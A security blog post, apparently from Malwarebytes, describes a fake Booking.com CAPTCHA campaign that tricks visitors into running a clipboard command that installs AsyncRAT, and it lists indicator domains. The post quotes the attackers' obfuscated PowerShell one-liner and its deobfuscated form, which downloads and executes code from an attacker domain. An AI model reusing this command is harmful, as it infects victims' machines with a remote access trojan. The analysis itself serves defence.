We found that cybercriminals are preparing for the impending holiday season with a redirect campaign leading to AsyncRAT.
Cybercriminals have started a campaign of redirecting links placed on gaming sites and social media—and as sponsored ads—that lead to fake websites posing as Booking.com. According to Malwarebytes research, 40% of people book travel through a general online search, creating a lot of opportunities for scammers.
The first signs of the campaign showed up mid-May and the final redirect destination changes every two to three days.
Following the links brings visitors to a familiar strategy where fake CAPTCHA websites hijack your clipboard and try to trick visitors into infecting their own device.
fake Captcha
fake Captcha prompt
As usual on these websites, by putting a checkmark in the fake Captcha prompt you’re giving the website permission to copy something to your clipboard.
Afterwards, the scammers involved will try to have the visitor execute a Run command on their computer. This type of prompt is never used in legitimate Captcha forms and should be immediately suspicious to all individuals.
instructions for the visitor
instructions to infect your own device
If you’re using Chrome, you may see this warning:
Chrome warns but for what?
Chrome issues a warning but it may the danger may be unclear to users
The warning is nice, but it’s not very clear what this warning is for, in my opinion.
Users of Malwarebytes’ Browser Guard will see this warning:
Browser Guard clipboard warning
Malwarebytes Browser Guard’s clipboard warning
“Hey, did you just copy something?
Heads up, your clipboard was just accessed from this website. Be sure you trust the owner before passing this someplace you don’t want it. Like a terminal or an email to your boss.”
Well, either way, don’t just discard these warnings. Even if you think you’re looking at an actual booking website, this is not the kind of instructions you’re expected to follow.
What the website just put on the clipboard may look like gobbledegook to some, though more experienced users will see the danger.
pOwERsheLl –N"O"p"rO" /w h -C"Om"ManD "$b"a"np = 'b"kn"g"n"et.com';$r"k"v = I"n"v"o"k"e-"R"e"stMethod -Uri $ba"n"p;I"nv"oke"-"E"xp"r"es"sion $r"k"v"
The cybercriminals used mixed casing, quote interruption, and variable name manipulation to hide their true intentions, but what it actually says (and does if you follow the instructions) is:
powershell -NoProfile -WindowStyle Hidden -Command "$banp = 'bkngnet.com'; $rkv = Invoke-RestMethod -Uri $banp; Invoke-Expression $rkv"
The malicious Captcha form tells the user to copy the content of the clipboard into the Windows Run dialog box and execute the instructions from the above command. When Browser Guard detects that the text copied to the clipboard contains this kind of potentially malicious command, it will add the phrase Suspicious Content at the front of the copied content which makes it an invalid command and the user will see a warning instead of having infected themselves.
Should a user fall for this without any protections enabled, the command will open a hidden powershell window to download and execute a file called ckjg.exe which in turn would download and execute a file called Stub.exe which is detected by Malwarebytes/ThreatDown as Backdoor.AsyncRAT.
Backdoor.AsyncRAT is a backdoor Trojan which serves as a Remote Access Tool (RAT) designed to remotely monitor and control other computers. In other words, it puts your device at the mercy of the person controlling the RAT.
The criminals can gather sensitive and financial information from infected devices which can lead to financial damages and even identity theft.
IOCs
The domains and subdomains we found associated with this campaign rotate quickly. From what I could retrace, they change the URL to the landing page every two to three days. But here is a list of recently active ones.
(booking.)chargesguestescenter[.]com
(booking.)badgustrewivers.com[.]com
(booking.)property-paids[.]com
(booking.)rewiewqproperty[.]com
(booking.)extranet-listing[.]com
(booking.)guestsalerts[.]com
(booking.)gustescharge[.]com
kvhandelregis[.]com
patheer-moreinfo[.]com
guestalerthelp[.]com
rewiewwselect[.]com
hekpaharma[.]com
bkngnet[.]com
partnervrft[.]com
Online criminals are targeting individuals and businesses that advertise via Google Ads by phishing them for their credentials — ironically — via fraudulent Google ads.
The scheme consists of stealing as many advertiser accounts as possible by impersonating Google Ads and redirecting victims to fake login pages. We believe their goal is to resell those accounts on blackhat forums, while also keeping some to themselves to perpetuate these campaigns.
This is the most egregious malvertising operation we have ever tracked, getting to the core of Google’s business and likely affecting thousands of their customers worldwide. We have been reporting new incidents around the clock and yet keep identifying new ones, even at the time of publication.
Invitations to try a beta lead to a fake game website where victims will get an information stealer instead of the promised game
A researcher has discovered a data broker had stored 644,869 PDF files in a publicly accessible cloud storage container.
Apple has issued patches for several of its operating systems. The ones for iOS and iPadOS deserve your immediate attention.
Chatbot companion platform muah.ai was hacked and had its chatbot prompts stolen.
Beware before calling Apple for assistance as scammers are creating malicious ads and fake pages to lure you in.
Criminals are impersonating MyLowesLife, Lowes' HR portal for current and former employees.
A notorious cybercriminal involved in breaches has released a database containing 70 million US criminal records.
Our researchers found fake sponsored search results that lead consumers to a typical fake Microsoft alert site set up by tech support scammers.
A malicious ad for the popular admin tool PuTTY leads victims to a fake site that downloads malware.
Data from a Chinese cybersecurity vendor that works for the Chinese government exposed a range of hacking tools and services.
Compromised websites are being used to redirect to fake browser updates and deliver malware onto Mac users.
The FBI is investigating a data breach where cybercriminals were able to steal patients’ records from a Las Vegas plastic surgeon's office and then publish them online.
Users looking to download a popular PC utility may be tricked in this campaign where a threat actor has registered a website that copies content from a PC and Windows news portal.
First publicly reported in 2018, DarkGate is a Windows-based malware with a wide-range of capabilities including credential stealing and remote access to victim endpoints. Until recently, it was only seen being delivered through traditional email malspam campaigns. In late August 2023, however, researchers at Trusec found evidence of a campaign using external Teams messages to deliver the DarkGate Loader.
In recent weeks, we have noted an increase in malvertising campaigns via Google searches. Several of the threat actors we are tracking have improved their techniques to evade detection throughout the delivery chain.
We believe this evolution will have a real world impact among corporate users getting compromised via malicious ads eventually leading to the deployment of malware and ransomware.
In this blog post, we look at a malvertising campaign that seems to have flown under the radar entirely for at least several months. It is unique in its way to fingerprint users and distribute time sensitive payloads.
A new malvertising campaign is targeting corporate users who are downloading the popular web conferencing software Webex. Threat actors have bought an advert that impersonates Cisco's brand and is displayed first when performing a Google search.
Web search is about to embark on a new journey thanks to artificial intelligence technology that online giants such as Microsoft and Google are experimenting with. Yet, there is a problem when it comes to malicious ads displayed by search engines that AI likely won't be able to fix.
